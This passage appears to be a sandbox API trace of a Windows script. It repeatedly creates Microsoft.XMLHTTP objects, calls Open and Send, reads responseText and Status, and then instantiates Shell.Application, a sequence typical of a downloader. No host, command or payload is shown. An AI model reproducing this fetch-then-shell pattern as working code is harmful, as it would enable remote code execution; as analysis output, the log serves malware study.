	[0619.993] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.993] SysStringLen (param_1=0x0) returned 0x0
	[0619.993] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.993] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0619.993] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0619.994] ??2@YAPEAX_K@Z () returned 0x62f310
	[0619.994] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0619.994] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0619.994] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0619.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0619.994] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0619.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0619.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0619.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0619.994] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.994] SysStringLen (param_1=0x0) returned 0x0
	[0619.995] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.995] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0619.995] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0619.995] ??2@YAPEAX_K@Z () returned 0x62f330
	[0619.995] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0619.995] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0619.995] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0619.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0619.995] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0619.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0619.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0619.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0619.996] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.996] SysStringLen (param_1=0x0) returned 0x0
	[0619.996] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.996] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0619.996] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0619.996] ??2@YAPEAX_K@Z () returned 0x62f310
	[0619.996] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0619.996] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0619.996] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0619.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0619.997] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0619.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0619.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0619.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0619.997] longjmp () 
	[0619.997] longjmp () 
	[0619.997] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.997] SysStringLen (param_1=0x0) returned 0x0
	[0619.997] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.998] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0619.998] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0619.998] ??2@YAPEAX_K@Z () returned 0x62f330
	[0619.998] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0619.998] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0619.998] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0619.998] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0619.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0619.999] longjmp () 
	[0619.999] longjmp () 
	[0619.999] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0619.999] SysStringLen (param_1=0x0) returned 0x0
	[0619.999] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0619.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0619.999] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0619.999] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0619.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0619.999] ??2@YAPEAX_K@Z () returned 0x62f310
	[0619.999] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0620.000] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0620.000] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0620.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0620.000] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0620.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0620.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0620.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0620.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0620.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0620.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0622.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0622.149] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0622.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0622.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0622.150] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0622.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0622.150] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0622.150] SysStringLen (param_1=0x0) returned 0x0
	[0622.150] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0622.150] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0622.150] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0622.150] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0622.150] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0622.150] ??2@YAPEAX_K@Z () returned 0x62f350
	[0622.151] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
